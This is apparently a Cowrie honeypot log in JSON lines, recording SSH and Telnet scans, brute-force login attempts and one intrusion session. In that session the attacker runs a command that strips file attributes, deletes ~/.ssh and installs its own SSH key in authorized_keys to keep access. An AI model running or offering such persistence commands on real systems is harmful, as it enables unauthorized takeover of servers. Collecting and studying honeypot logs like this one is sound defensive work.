{"eventid":"cowrie.session.connect","src_ip":"92.118.39.62","src_port":37458,"dst_ip":"1.2.3.4","dst_port":22,"session":"78907edfb567","protocol":"ssh","message":"New connection: 92.118.39.62:37458 (1.2.3.4:22) [session: 78907edfb567]","sensor":"my-vps","timestamp":"2025-09-09T04:45:34.214874Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T04:45:34.215710Z","src_ip":"92.118.39.62","session":"78907edfb567"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T04:45:34.245398Z","src_ip":"92.118.39.62","session":"78907edfb567"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin@123","message":"login attempt [admin/admin@123] failed","sensor":"my-vps","timestamp":"2025-09-09T04:45:34.337043Z","src_ip":"92.118.39.62","session":"78907edfb567"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:45:35.369691Z","src_ip":"92.118.39.62","session":"78907edfb567"}
{"eventid":"cowrie.session.closed","duration":30.73544692993164,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:45:50.147295Z","src_ip":"212.227.125.160","session":"d4362198e08e"}
{"eventid":"cowrie.session.connect","src_ip":"102.68.86.62","src_port":43514,"dst_ip":"1.2.3.4","dst_port":22,"session":"c9d43fa086c9","protocol":"ssh","message":"New connection: 102.68.86.62:43514 (1.2.3.4:22) [session: c9d43fa086c9]","sensor":"my-vps","timestamp":"2025-09-09T04:46:13.963393Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:46:13.964243Z","src_ip":"102.68.86.62","session":"c9d43fa086c9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:46:14.303689Z","src_ip":"102.68.86.62","session":"c9d43fa086c9"}
{"eventid":"cowrie.login.success","username":"root","password":"poiuytrewq","message":"login attempt [root/poiuytrewq] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:46:15.110948Z","src_ip":"102.68.86.62","session":"c9d43fa086c9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:46:15.591294Z","src_ip":"102.68.86.62","session":"c9d43fa086c9"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:46:15.592015Z","src_ip":"102.68.86.62","session":"c9d43fa086c9"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:46:15.593072Z","src_ip":"102.68.86.62","session":"c9d43fa086c9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:46:15.788242Z","src_ip":"102.68.86.62","session":"c9d43fa086c9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:46:16.228440Z","src_ip":"102.68.86.62","session":"c9d43fa086c9"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:46:16.229230Z","src_ip":"102.68.86.62","session":"c9d43fa086c9"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:46:16.405395Z","src_ip":"102.68.86.62","session":"c9d43fa086c9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:46:16.406233Z","src_ip":"102.68.86.62","session":"c9d43fa086c9"}
{"eventid":"cowrie.session.connect","src_ip":"102.68.86.62","src_port":60384,"dst_ip":"1.2.3.4","dst_port":22,"session":"6245c14fb4c6","protocol":"ssh","message":"New connection: 102.68.86.62:60384 (1.2.3.4:22) [session: 6245c14fb4c6]","sensor":"my-vps","timestamp":"2025-09-09T04:46:22.662858Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:46:22.664141Z","src_ip":"102.68.86.62","session":"6245c14fb4c6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:46:22.916228Z","src_ip":"102.68.86.62","session":"6245c14fb4c6"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:46:24.034832Z","src_ip":"102.68.86.62","session":"6245c14fb4c6"}
{"eventid":"cowrie.session.closed","duration":"10.4","message":"Connection lost after 10.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:46:24.320385Z","src_ip":"102.68.86.62","session":"c9d43fa086c9"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:46:24.321222Z","src_ip":"102.68.86.62","session":"6245c14fb4c6"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":50466,"dst_ip":"1.2.3.4","dst_port":22,"session":"4f2374c53c96","protocol":"ssh","message":"New connection: 217.72.205.35:50466 (1.2.3.4:22) [session: 4f2374c53c96]","sensor":"my-vps","timestamp":"2025-09-09T04:47:13.715212Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:47:13.716295Z","src_ip":"217.72.205.35","session":"4f2374c53c96"}
{"eventid":"cowrie.session.connect","src_ip":"102.68.86.62","src_port":35392,"dst_ip":"1.2.3.4","dst_port":22,"session":"29d99ff44125","protocol":"ssh","message":"New connection: 102.68.86.62:35392 (1.2.3.4:22) [session: 29d99ff44125]","sensor":"my-vps","timestamp":"2025-09-09T04:48:15.530123Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:48:15.531016Z","src_ip":"102.68.86.62","session":"29d99ff44125"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:48:15.708123Z","src_ip":"102.68.86.62","session":"29d99ff44125"}
{"eventid":"cowrie.login.failed","username":"server","password":"123123","message":"login attempt [server/123123] failed","sensor":"my-vps","timestamp":"2025-09-09T04:48:16.474043Z","src_ip":"102.68.86.62","session":"29d99ff44125"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:48:17.714236Z","src_ip":"102.68.86.62","session":"29d99ff44125"}
{"eventid":"cowrie.session.connect","src_ip":"172.105.246.139","src_port":48178,"dst_ip":"1.2.3.4","dst_port":22,"session":"b66949933bdc","protocol":"ssh","message":"New connection: 172.105.246.139:48178 (1.2.3.4:22) [session: b66949933bdc]","sensor":"my-vps","timestamp":"2025-09-09T04:50:24.868134Z"}
{"eventid":"cowrie.session.connect","src_ip":"172.105.246.139","src_port":60924,"dst_ip":"1.2.3.4","dst_port":23,"session":"2a1ac73bea2a","protocol":"telnet","message":"New connection: 172.105.246.139:60924 (1.2.3.4:23) [session: 2a1ac73bea2a]","sensor":"my-vps","timestamp":"2025-09-09T04:50:24.869240Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:50:24.924341Z","src_ip":"172.105.246.139","session":"b66949933bdc"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-09-09T04:50:30.888514Z","src_ip":"172.105.246.139","session":"2a1ac73bea2a"}
{"eventid":"cowrie.session.closed","duration":10.97313666343689,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:50:35.842322Z","src_ip":"172.105.246.139","session":"2a1ac73bea2a"}
{"eventid":"cowrie.session.connect","src_ip":"172.105.246.139","src_port":57000,"dst_ip":"1.2.3.4","dst_port":23,"session":"181cca905c87","protocol":"telnet","message":"New connection: 172.105.246.139:57000 (1.2.3.4:23) [session: 181cca905c87]","sensor":"my-vps","timestamp":"2025-09-09T04:50:35.868101Z"}
{"eventid":"cowrie.session.closed","duration":5.016914367675781,"message":"Connection lost after 5 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:50:40.884952Z","src_ip":"172.105.246.139","session":"181cca905c87"}
{"eventid":"cowrie.session.connect","src_ip":"172.105.246.139","src_port":57016,"dst_ip":"1.2.3.4","dst_port":23,"session":"62554633612b","protocol":"telnet","message":"New connection: 172.105.246.139:57016 (1.2.3.4:23) [session: 62554633612b]","sensor":"my-vps","timestamp":"2025-09-09T04:50:40.928944Z"}
{"eventid":"cowrie.login.failed","username":"GET / HTTP/1.0","password":"","message":"login attempt [GET / HTTP/1.0/] failed","sensor":"my-vps","timestamp":"2025-09-09T04:50:40.929928Z","src_ip":"172.105.246.139","session":"62554633612b"}
{"eventid":"cowrie.session.closed","duration":4.981198072433472,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:50:45.910065Z","src_ip":"172.105.246.139","session":"62554633612b"}
{"eventid":"cowrie.session.connect","src_ip":"172.105.246.139","src_port":58650,"dst_ip":"1.2.3.4","dst_port":23,"session":"6b833a6bda0a","protocol":"telnet","message":"New connection: 172.105.246.139:58650 (1.2.3.4:23) [session: 6b833a6bda0a]","sensor":"my-vps","timestamp":"2025-09-09T04:50:45.929796Z"}
{"eventid":"cowrie.login.failed","username":"OPTIONS / HTTP/1.0","password":"","message":"login attempt [OPTIONS / HTTP/1.0/] failed","sensor":"my-vps","timestamp":"2025-09-09T04:50:45.930926Z","src_ip":"172.105.246.139","session":"6b833a6bda0a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60923,"dst_ip":"1.2.3.4","dst_port":23,"session":"22483ab43528","protocol":"telnet","message":"New connection: 212.227.125.160:60923 (1.2.3.4:23) [session: 22483ab43528]","sensor":"my-vps","timestamp":"2025-09-09T04:50:50.732457Z"}
{"eventid":"cowrie.session.closed","duration":5.0415449142456055,"message":"Connection lost after 5 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:50:50.971274Z","src_ip":"172.105.246.139","session":"6b833a6bda0a"}
{"eventid":"cowrie.session.connect","src_ip":"172.105.246.139","src_port":58658,"dst_ip":"1.2.3.4","dst_port":23,"session":"3b5bf82a045c","protocol":"telnet","message":"New connection: 172.105.246.139:58658 (1.2.3.4:23) [session: 3b5bf82a045c]","sensor":"my-vps","timestamp":"2025-09-09T04:50:51.029737Z"}
{"eventid":"cowrie.login.failed","username":"OPTIONS / RTSP/1.0","password":"","message":"login attempt [OPTIONS / RTSP/1.0/] failed","sensor":"my-vps","timestamp":"2025-09-09T04:50:51.030943Z","src_ip":"172.105.246.139","session":"3b5bf82a045c"}
{"eventid":"cowrie.session.connect","src_ip":"139.19.117.131","src_port":49106,"dst_ip":"1.2.3.4","dst_port":22,"session":"b7e7578b0ec4","protocol":"ssh","message":"New connection: 139.19.117.131:49106 (1.2.3.4:22) [session: b7e7578b0ec4]","sensor":"my-vps","timestamp":"2025-09-09T04:50:51.090548Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T04:50:51.091344Z","src_ip":"139.19.117.131","session":"b7e7578b0ec4"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-09-09T04:50:51.109699Z","src_ip":"139.19.117.131","session":"b7e7578b0ec4"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"92:53:c2:45:64:14:44:b5:bb:23:e7:0e:f1:43:d2:5f","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDIHOZv7Y48fd8PViQw8eOnHzHW2ma+L9ATe2qfrvUvEsBgKG5sjQ95gsgbzQzsPvzutkesAuECtD3oj/USIe4eOqyOh/HG1a6MKuflXM3qQUEDaniKYYl2ppofsPdmI5bcgv/lY2ld44CeYIoPnO/FdSUcvNebbIQRkBmbekb+4uSKKOrSdRAuYYAOvLlPYXIcNHWF6pQMfTtqnM3G/hGf2htD0m4N5BuQqV4a5T3nvFnige9wBVCAg2jHOPD4Mx4UGbfG9LaR12rQ9KM0Gv5IDItdV14M81vSshwLBo0EvWYu5WgNoH34xJfRk21U469ve9Ve4AbP4K2Mbo3lSAsH","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint 92:53:c2:45:64:14:44:b5:bb:23:e7:0e:f1:43:d2:5f","sensor":"my-vps","timestamp":"2025-09-09T04:50:51.146968Z","src_ip":"139.19.117.131","session":"b7e7578b0ec4"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"92:53:c2:45:64:14:44:b5:bb:23:e7:0e:f1:43:d2:5f","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDIHOZv7Y48fd8PViQw8eOnHzHW2ma+L9ATe2qfrvUvEsBgKG5sjQ95gsgbzQzsPvzutkesAuECtD3oj/USIe4eOqyOh/HG1a6MKuflXM3qQUEDaniKYYl2ppofsPdmI5bcgv/lY2ld44CeYIoPnO/FdSUcvNebbIQRkBmbekb+4uSKKOrSdRAuYYAOvLlPYXIcNHWF6pQMfTtqnM3G/hGf2htD0m4N5BuQqV4a5T3nvFnige9wBVCAg2jHOPD4Mx4UGbfG9LaR12rQ9KM0Gv5IDItdV14M81vSshwLBo0EvWYu5WgNoH34xJfRk21U469ve9Ve4AbP4K2Mbo3lSAsH","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-09T04:50:51.147833Z","src_ip":"139.19.117.131","session":"b7e7578b0ec4"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"92:53:c2:45:64:14:44:b5:bb:23:e7:0e:f1:43:d2:5f","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDIHOZv7Y48fd8PViQw8eOnHzHW2ma+L9ATe2qfrvUvEsBgKG5sjQ95gsgbzQzsPvzutkesAuECtD3oj/USIe4eOqyOh/HG1a6MKuflXM3qQUEDaniKYYl2ppofsPdmI5bcgv/lY2ld44CeYIoPnO/FdSUcvNebbIQRkBmbekb+4uSKKOrSdRAuYYAOvLlPYXIcNHWF6pQMfTtqnM3G/hGf2htD0m4N5BuQqV4a5T3nvFnige9wBVCAg2jHOPD4Mx4UGbfG9LaR12rQ9KM0Gv5IDItdV14M81vSshwLBo0EvWYu5WgNoH34xJfRk21U469ve9Ve4AbP4K2Mbo3lSAsH","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint 92:53:c2:45:64:14:44:b5:bb:23:e7:0e:f1:43:d2:5f","sensor":"my-vps","timestamp":"2025-09-09T04:50:51.166279Z","src_ip":"139.19.117.131","session":"b7e7578b0ec4"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"92:53:c2:45:64:14:44:b5:bb:23:e7:0e:f1:43:d2:5f","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDIHOZv7Y48fd8PViQw8eOnHzHW2ma+L9ATe2qfrvUvEsBgKG5sjQ95gsgbzQzsPvzutkesAuECtD3oj/USIe4eOqyOh/HG1a6MKuflXM3qQUEDaniKYYl2ppofsPdmI5bcgv/lY2ld44CeYIoPnO/FdSUcvNebbIQRkBmbekb+4uSKKOrSdRAuYYAOvLlPYXIcNHWF6pQMfTtqnM3G/hGf2htD0m4N5BuQqV4a5T3nvFnige9wBVCAg2jHOPD4Mx4UGbfG9LaR12rQ9KM0Gv5IDItdV14M81vSshwLBo0EvWYu5WgNoH34xJfRk21U469ve9Ve4AbP4K2Mbo3lSAsH","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-09T04:50:51.166932Z","src_ip":"139.19.117.131","session":"b7e7578b0ec4"}
{"eventid":"cowrie.session.closed","duration":4.980015277862549,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:50:56.009685Z","src_ip":"172.105.246.139","session":"3b5bf82a045c"}
{"eventid":"cowrie.session.connect","src_ip":"172.105.246.139","src_port":45544,"dst_ip":"1.2.3.4","dst_port":23,"session":"c2570eb191cb","protocol":"telnet","message":"New connection: 172.105.246.139:45544 (1.2.3.4:23) [session: c2570eb191cb]","sensor":"my-vps","timestamp":"2025-09-09T04:50:56.042392Z"}
{"eventid":"cowrie.session.closed","duration":5.0042502880096436,"message":"Connection lost after 5 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:51:01.046557Z","src_ip":"172.105.246.139","session":"c2570eb191cb"}
{"eventid":"cowrie.session.connect","src_ip":"172.105.246.139","src_port":45556,"dst_ip":"1.2.3.4","dst_port":23,"session":"227e268c2270","protocol":"telnet","message":"New connection: 172.105.246.139:45556 (1.2.3.4:23) [session: 227e268c2270]","sensor":"my-vps","timestamp":"2025-09-09T04:51:01.083634Z"}
